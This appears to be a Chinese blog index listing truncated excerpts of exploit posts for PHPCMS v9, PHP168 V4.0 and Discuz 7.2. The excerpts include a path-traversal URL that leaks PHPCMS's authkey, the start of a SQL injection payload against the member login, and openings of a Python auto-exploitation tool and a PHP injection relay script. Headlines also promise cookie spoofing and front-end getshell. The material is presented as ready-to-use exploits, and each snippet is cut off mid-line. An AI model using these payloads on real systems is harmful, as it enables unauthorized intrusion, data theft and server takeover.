原创 phpcms authkey泄露漏洞

網址加/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\c

原创 phpcmsv9最新高危sql注入exp

獲取當前數據庫http://192.168.1.139:8080/phpcms/index.php?m=member&c=index&a=loginpost:forward=http%253A%252F%252F192.168.1.139%

原创 PHPCMSV9 AuthKey泄露導致注入EXP

天小站發佈了PHPCMSV9 AuthKey泄露導致SQL注入的文章,熟悉本站的兄弟們都知道,今天可能就會發布EXP了,恭喜你,又猜對了。好久沒有寫PHP版的EXP了,這次再寫就已經基本忘光了,唉,花了好久的時間呀,最終還是完成了。其實使用

原创 PHP168 V4.0 cookie欺騙 EXP

漏洞的原理:具體的請看admin/global.php這個文件裏面關於用戶登陸部分的代碼,這裏截取一下。。。/*用戶登錄*/ if( $_POST[loginname] && $_POST[loginpwd] ) {  if( $webdb

原创 Python Discuz 7.2 faq.php 注入漏洞全自動利用工具

#!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: gb2312 -*- # -*- coding: utf_8 -*-  # author iswin  import sys

原创 phpcms authkey注入中轉腳本

<?php set_time_limit(0); $wang_url = 'http://www.0day5.com';   $auth_key = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxx';   $str = "uid

原创 phpcms v9 前臺無限制GETSHELL

0x01:介紹PHPCMS V9(後面簡稱V9)採用PHP5+MYSQL做爲技術基礎進行開發。V9採用OOP(面向對象)方式進行基礎運行框架搭建。模塊化開發方式做爲功能開發形式。框架易於功能擴展,代碼維護,優秀的二次開發能力,可滿足所有網站